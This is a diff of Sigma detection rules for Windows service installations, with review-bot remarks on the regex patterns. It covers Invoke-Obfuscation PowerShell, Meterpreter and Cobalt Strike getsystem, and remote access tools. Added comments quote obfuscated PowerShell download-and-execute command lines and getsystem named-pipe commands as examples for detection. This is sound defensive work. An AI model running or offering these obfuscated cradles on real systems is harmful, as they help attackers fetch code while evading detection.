 - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
@@ -20,13 +19,13 @@ detection:
 selection_eid:
 EventID: 7045
 selection_imagepath:
- - ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
- - ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
- - ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
- - ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
- - ImagePath|re: \\*mdr\*\W\s*\)\.Name
- - ImagePath|re: \$VerbosePreference\.ToString\(
- - ImagePath|re: \String\]\s*\$VerbosePreference
+ - ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
+ - ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
+ - ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
+ - ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
+ - ImagePath|re: \\*mdr\*\W\s*\)\.Name
+ - ImagePath|re: \$VerbosePreference\.ToString\(
+ - ImagePath|re: \String\]\s*\$VerbosePreference
 condition: system and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml
index 21c5357e1..4ea5a7bea 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml
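Review bot: In the re-indented `selection_imagepath` list the last pattern `\String\]\s*\$VerbosePreference` begins with `\S`, which regex engines read as the non-whitespace character class rather than an escaped `S`; the expression therefore matches any non-blank character followed by `tring]`, and only matches the intended `[String]` cast by accident. If the literal cast is what is meant, the bracket should be escaped instead: `- ImagePath|re: \[String\]\s*\$VerbosePreference`. The neighbouring `\\*mdr\*\W\s*\)\.Name` deserves the same check, since `\\*` parses as "zero or more backslashes" and probably was meant to be a single escaped `*`; the re-indentation is a good moment to verify both against the linked Out-ObfuscatedStringCommand.ps1 block. The `condition` requires all selections, so a silently over- or under-matching pattern here changes what the rule fires on.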
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml
@@ -3,7 +3,7 @@ id: 72862bf2-0eb1-11eb-adc1-0242ac120002
 status: test
 description: Detects Obfuscated use of stdin to execute PowerShell
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25)
 author: Jonathan Cheong, oscd.community
 date: 2020/10/15
 modified: 2022/11/29
@@ -21,6 +21,9 @@ detection:
 selection_main:
 Provider_Name: Service Control Manager
 EventID: 7045
+ # ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"'
+ # Example 1: c:\windows\sYstEm32\CmD.eXE /C"echO\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -"
+ # Example 2: c:\WiNDOws\sysTEm32\cmd.EXe /C " ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )"
 ImagePath|contains|all:
 - cmd
 - powershell
@@ -28,10 +31,10 @@ detection:
 - /c
 - /r
 selection_other:
- - ImagePath|contains: noexit
- - ImagePath|contains|all:
- - input
- - $
+ - ImagePath|contains: noexit
+ - ImagePath|contains|all:
+ - input
+ - $
 condition: system and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml
index c80f1d928..85e5b9a18 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml
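Review bot: The second alternative in the re-indented `selection_other`, `ImagePath|contains|all` over `input` and `$`, adds almost no selectivity beyond `input` alone, because nearly any PowerShell command line contains a `$` somewhere; the regex the new comment documents (`\$\{?input\}?`) requires the two to be adjacent. If that regex is the reference, a closer `contains` approximation would be `- ImagePath|contains: ['$input', '${input']` in place of the two-element `all` list, which keeps the rule regex-free but removes the spurious match on unrelated `$` uses. The added comment itself is a good addition, since it records the intent the `contains` lists approximate.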
@@ -3,7 +3,7 @@ id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/29 @@ -21,6 +21,9 @@ detection: selection: Provider_Name: Service Control Manager EventID: 7045 + # ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + # Example 1: C:\winDoWs\SySTeM32\cmd.Exe /C"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\"{2}{3}{0}{1}\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\"IN`VO`KecOmMaND\".\"inVo`KES`crIPt\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\"{1}{4}{2}{3}{0}\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \"{0}{1}\"-f'n','oti' ),( \"{0}{1}\" -f'pRoC','esS') )) )" + # Example 2: cMD.exe /C "seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\"{1}{0}{2}{3}\" -f 'eT-vaR','G','iab','lE' ) (\"{0}{1}\" -f '*m','DR*' ) ).\"na`ME\"[3,11,2]-JOIN'' ) ( ( ^&(\"{0}{1}\" -f'g','CI' ) (\"{0}{1}\" -f 'ENV',':SlDb' ) ).\"VA`luE\" ) " ImagePath|contains|all: - cmd - '"set' diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml index 33fcd8eb6..daaa7b44b 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml 
@@ -3,7 +3,7 @@ id: 175997c5-803c-4b08-8bb0-70b099f47595
 status: test
 description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)
 author: Timur Zinniatullin, oscd.community
 date: 2020/10/18
 modified: 2022/11/29
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml
index 46b318ed4..d1a5aad22 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml
@@ -3,7 +3,7 @@ id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9
 status: test
 description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)
 author: Timur Zinniatullin, oscd.community
 date: 2020/10/18
 modified: 2022/11/29
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml
index 700bb6d03..b2164ce6a 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml
@@ -3,7 +3,7 @@ id: 487c7524-f892-4054-b263-8a0ace63fc25
 status: test
 description: Detects Obfuscated Powershell via Stdin in Scripts
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)
 author: Nikita Nazarov, oscd.community
 date: 2020/10/12
 modified: 2022/11/29
@@ -21,6 +21,7 @@ detection:
 selection:
 Provider_Name: Service Control Manager
 EventID: 7045
+ # ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"'
 ImagePath|contains|all:
 - set
 - '&&'
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml
index 09870974d..2ddf87ec4 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml
@@ -3,7 +3,7 @@ id: 63e3365d-4824-42d8-8b82-e56810fefa0c
 status: test
 description: Detects Obfuscated Powershell via use Clip.exe in Scripts
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)
 author: Nikita Nazarov, oscd.community
 date: 2020/10/09
 modified: 2022/11/29
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml
index 6d31edde2..5bfb23151 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml
@@ -3,7 +3,7 @@ id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4
 status: test
 description: Detects Obfuscated Powershell via use MSHTA in Scripts
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)
 author: Nikita Nazarov, oscd.community
 date: 2020/10/09
 modified: 2022/11/29
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml
index 559c08305..9341d4795 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml
@@ -3,7 +3,7 @@ id: 641a4bfb-c017-44f7-800c-2aee0184ce9b
 status: test
 description: Detects Obfuscated Powershell via use Rundll32 in Scripts
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task30)
 author: Nikita Nazarov, oscd.community
 date: 2020/10/09
 modified: 2022/11/29
diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml
index 2d9843c70..b1e5f1a38 100644
--- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml
@@ -3,7 +3,7 @@ id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6
 status: test
 description: Detects Obfuscated Powershell via VAR++ LAUNCHER
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)
 author: Timur Zinniatullin, oscd.community
 date: 2020/10/13
 modified: 2022/11/29
@@ -21,6 +21,9 @@ detection: selection: Provider_Name: Service Control Manager EventID: 7045 + # ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + # Example 1: CMD /C"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\wINDowS\sYsWow64\winDOWspoWERSheLl\V1.0\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\"invo`kEcoMm`A`ND\".( \"{2}{1}{0}\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \"{0}{1}\" -f'D','IR' ) ( \"{0}{1}\"-f'ENV:kU','R')).\"vAl`Ue\" )&& CMD /C%mXI%" + # Example 2: c:\WiNDOWS\sYSTEm32\CmD.exE /C "sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\"{2}{0}{1}\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \"{2}{3}{0}{1}\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \"{2}{5}{0}{1}{6}{4}{3}\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \"{0}{1}\"-f'd','ejLz' ),( \"{1}{2}{0}\"-f'cEss','P','RO') )) )&& c:\WiNDOWS\sYSTEm32\CmD.exE /C %ybkm%" ImagePath|contains|all: - '&&set' - cmd diff --git a/sigma/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml b/sigma/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml index 82a6821d0..8c3639671 100644 --- a/sigma/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml +++ b/sigma/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml 
@@ -1,9 +1,7 @@
 title: KrbRelayUp Service Installation
 id: e97d9903-53b2-41fc-8cb9-889ed4093e80
 status: test
-description: Detects service creation from KrbRelayUp tool used for privilege escalation
- in Windows domain environments where LDAP signing is not enforced (the default
- settings)
+description: Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)
 references:
 - https://github.com/Dec0ne/KrbRelayUp
 author: Sittikorn S, Tim Shelton
diff --git a/sigma/builtin/system/service_control_manager/win_system_mal_creddumper.yml b/sigma/builtin/system/service_control_manager/win_system_mal_creddumper.yml
index 8007f2a4b..4d5823199 100644
--- a/sigma/builtin/system/service_control_manager/win_system_mal_creddumper.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_mal_creddumper.yml
@@ -1,12 +1,10 @@
 title: Credential Dumping Tools Service Execution - System
 id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
 status: test
-description: Detects well-known credential dumping tools execution via service execution
- events
+description: Detects well-known credential dumping tools execution via service execution events
 references:
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy,
- oscd.community
+author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
 date: 2017/03/05
 modified: 2022/11/29
 tags:
diff --git a/sigma/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/sigma/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
index 0ca73ac59..3c068303a 100644
--- a/sigma/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
@@ -1,8 +1,7 @@
 title: Meterpreter or Cobalt Strike Getsystem Service Installation - System
 id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6
 status: test
-description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting
- a specific service installation
+description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
 - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
@@ -23,6 +22,9 @@ detection:
 Provider_Name: Service Control Manager
 EventID: 7045
 selection_cli_cmd:
+ # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a
+ # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
+ # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
 ImagePath|contains|all:
 - /c
 - echo
@@ -31,12 +33,13 @@ detection:
 - cmd
 - '%COMSPEC%'
 selection_cli_rundll:
+ # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn
 ImagePath|contains|all:
 - rundll32
 - .dll,a
 - '/p:'
 selection_cli_share:
- ImagePath|startswith: \\\\127.0.0.1\\ADMIN$\
+ ImagePath|startswith: \\\\127.0.0.1\\ADMIN$\ # https://twitter.com/svch0st/status/1413688851877416960?lang=en
 condition: system and (selection_id and 1 of selection_cli_*)
 falsepositives:
 - Unlikely
diff --git a/sigma/builtin/system/service_control_manager/win_system_moriya_rootkit.yml b/sigma/builtin/system/service_control_manager/win_system_moriya_rootkit.yml
index 8602a000b..100c2459f 100644
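Review bot: The third comment added under `selection_cli_cmd` is labelled `technique 1b (expanded %COMSPEC%)` but repeats the unexpanded `%COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a` of the line above it, so it documents nothing the previous line does not and contradicts its own label. It should show the expanded form, which is what the `cmd` alternative in the selection (visible at the top of the next hunk) exists to catch: `# cobaltstrike getsystem technique 1b (expanded %COMSPEC%): <expanded cmd.exe path> /c echo 559891bb017 > \\.\pipe\5e120a`, with the placeholder replaced by the actual cmd.exe path. The `selection_cli_cmd` block itself starts in this hunk but its `contains|all` list continues past the hunk end.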
--- a/sigma/builtin/system/service_control_manager/win_system_moriya_rootkit.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_moriya_rootkit.yml
@@ -1,8 +1,7 @@
 title: Moriya Rootkit - System
 id: 25b9c01c-350d-4b95-bed1-836d04a4f324
 status: test
-description: Detects the use of Moriya rootkit as described in the securelist's Operation
- TunnelSnake report
+description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
 references:
 - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
 author: Bhabesh Raj
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_anydesk.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_anydesk.yml
index e14223a28..7603c2ef5 100644
--- a/sigma/builtin/system/service_control_manager/win_system_service_install_anydesk.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_service_install_anydesk.yml
@@ -1,8 +1,7 @@
 title: Anydesk Remote Access Software Service Installation
 id: 530a6faa-ff3d-4022-b315-50828e77eef5
 status: test
-description: Detects the installation of the anydesk software service. Which could
- be an indication of anydesk abuse if you the software isn't already used.
+description: Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.
 references:
 - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml
index 8461744c9..f9f9b545f 100644
--- a/sigma/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml
@@ -19,10 +19,11 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ServiceName: csexecsvc - - ImagePath|endswith: \csexecsvc.exe + - ServiceName: csexecsvc + - ImagePath|endswith: \csexecsvc.exe condition: system and (all of selection_*) falsepositives: - Unknown level: medium + ruletype: Sigma diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_hacktools.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_hacktools.yml index 571d3b2d6..b5ad3489b 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_hacktools.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_hacktools.yml @@ -33,7 +33,7 @@ detection: - WCESERVICE - winexesvc selection_service_image: - ImagePath|contains: bypass + ImagePath|contains: bypass # https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82#file-scmuacbypass-cpp-L159 condition: system and (selection_eid and 1 of selection_service_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml index 1f8667033..1428a25ea 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml @@ -1,8 +1,7 @@ title: Mesh Agent Service Installation id: e0d1ad53-c7eb-48ec-a87a-72393cc6cedc status: test -description: Detects a Mesh Agent service installation. Mesh Agent is used to remotely - manage computers +description: Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,8 +19,8 @@ detection:
 Provider_Name: Service Control Manager
 EventID: 7045
 selection_service:
- - ImagePath|contains: MeshAgent.exe
- - ServiceName|contains: Mesh Agent
+ - ImagePath|contains: MeshAgent.exe
+ - ServiceName|contains: Mesh Agent
 condition: system and (all of selection_*)
 falsepositives:
 - Legitimate use of the tool
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml
index 9e0fb1e01..ded3cd867 100644
--- a/sigma/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml
@@ -12,14 +12,22 @@ logsource:
 product: windows
 service: system
 detection:
+ # Example:
+ #
+ # Client32
+ # "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
+ # user mode service
+ # auto start
+ # LocalSystem
+ #
 system:
 Channel: System
 selection_root:
 Provider_Name: Service Control Manager
 EventID: 7045
 selection_service:
- - ImagePath|contains: \NetSupport Manager\client32.exe
- - ServiceName: Client32
+ - ImagePath|contains: \NetSupport Manager\client32.exe
+ - ServiceName: Client32
 condition: system and (all of selection_*)
 falsepositives:
 - Legitimate use of the tool
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_paexec.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_paexec.yml
index 076f11909..a2b13454a 100644
--- a/sigma/builtin/system/service_control_manager/win_system_service_install_paexec.yml
+++ b/sigma/builtin/system/service_control_manager/win_system_service_install_paexec.yml
@@ -19,8 +19,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_image: - - ServiceName|startswith: PAExec- - - ImagePath|startswith: C:\WINDOWS\PAExec- + - ServiceName|startswith: PAExec- + - ImagePath|startswith: C:\WINDOWS\PAExec- condition: system and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml index 75c1eaf05..d118e5f87 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml @@ -1,13 +1,9 @@ title: New PDQDeploy Service - Server Side id: ee9ca27c-9bd7-4cee-9b01-6e906be7cae3 status: test -description: 'Detects a PDQDeploy service installation which indicates that PDQDeploy - was installed on the machines. - - PDQDeploy can be abused by attackers to remotely install packages or execute commands - on target machines - - ' +description: | + Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. + PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines references: - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm author: Nasreddine Bencherchali (Nextron Systems) @@ -25,10 +21,10 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains: PDQDeployService.exe - - ServiceName: - - PDQDeploy - - PDQ Deploy + - ImagePath|contains: PDQDeployService.exe + - ServiceName: + - PDQDeploy + - PDQ Deploy condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool 
diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml index a505141de..a6d72a249 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml @@ -1,13 +1,9 @@ title: New PDQDeploy Service - Client Side id: b98a10af-1e1e-44a7-bab2-4cc026917648 status: test -description: 'Detects PDQDeploy service installation on the target system. - - When a package is deployed via PDQDeploy it installs a remote service on the target - machine with the name "PDQDeployRunner-X" where "X" is an integer starting from - 1 - - ' +description: | + Detects PDQDeploy service installation on the target system. + When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1 references: - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm author: Nasreddine Bencherchali (Nextron Systems) @@ -25,8 +21,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains: PDQDeployRunner- - - ServiceName|startswith: PDQDeployRunner- + - ImagePath|contains: PDQDeployRunner- + - ServiceName|startswith: PDQDeployRunner- condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml index 0c053a067..5b8346d7c 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml 
@@ -1,8 +1,7 @@ title: ProcessHacker Privilege Elevation id: c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9 status: test -description: Detects a ProcessHacker tool that elevated privileges to a very high - level +description: Detects a ProcessHacker tool that elevated privileges to a very high level references: - https://twitter.com/1kwpeter/status/1397816101455765504 author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_remcom.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_remcom.yml index 3deb9f9ff..2b784c050 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_remcom.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_remcom.yml @@ -19,8 +19,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ServiceName: RemComSvc - - ImagePath|endswith: \RemComSvc.exe + - ServiceName: RemComSvc + - ImagePath|endswith: \RemComSvc.exe condition: system and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml index 6ab4ff9b3..f87c475b0 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml 
@@ -1,11 +1,10 @@ title: Remote Access Tool Services Have Been Installed - System id: 1a31b18a-f00c-4061-9900-f735b96c99fc related: - - id: c8b00925-926c-47e3-beea-298fd563728e - type: similar + - id: c8b00925-926c-47e3-beea-298fd563728e + type: similar status: experimental -description: Detects service installation of different remote access tools software. - These software are often abused by threat actors to perform +description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform references: - https://redcanary.com/blog/misbehaving-rats/ author: Connor Martin, Nasreddine Bencherchali @@ -27,25 +26,26 @@ detection: - 7045 - 7036 ServiceName|contains: - - AmmyyAdmin + # Based on https://github.com/SigmaHQ/sigma/pull/2841 + - AmmyyAdmin # https://www.ammyy.com/en/ - Atera - - BASupportExpressSrvcUpdater - - BASupportExpressStandaloneService + - BASupportExpressSrvcUpdater # https://www.systemlookup.com/O23/6837-BASupSrvcUpdater_exe.html + - BASupportExpressStandaloneService # https://www.systemlookup.com/O23/6839-BASupSrvc_exe.html - chromoting - - GoToAssist - - GoToMyPC + - GoToAssist # https://www.goto.com/it-management/resolve + - GoToMyPC # https://get.gotomypc.com/ - jumpcloud - - LMIGuardianSvc - - LogMeIn + - LMIGuardianSvc # https://www.logmein.com/ + - LogMeIn # https://www.logmein.com/ - monblanking - Parsec - - RManService - - RPCPerformanceService - - RPCService - - SplashtopRemoteService + - RManService # https://www.systemlookup.com/O23/7855-rutserv_exe.html + - RPCPerformanceService # https://www.remotepc.com/ + - RPCService # https://www.remotepc.com/ + - SplashtopRemoteService # https://www.splashtop.com/ - SSUService - TeamViewer - - TightVNC + - TightVNC # https://www.tightvnc.com/ - vncserver - Zoho condition: system and selection 
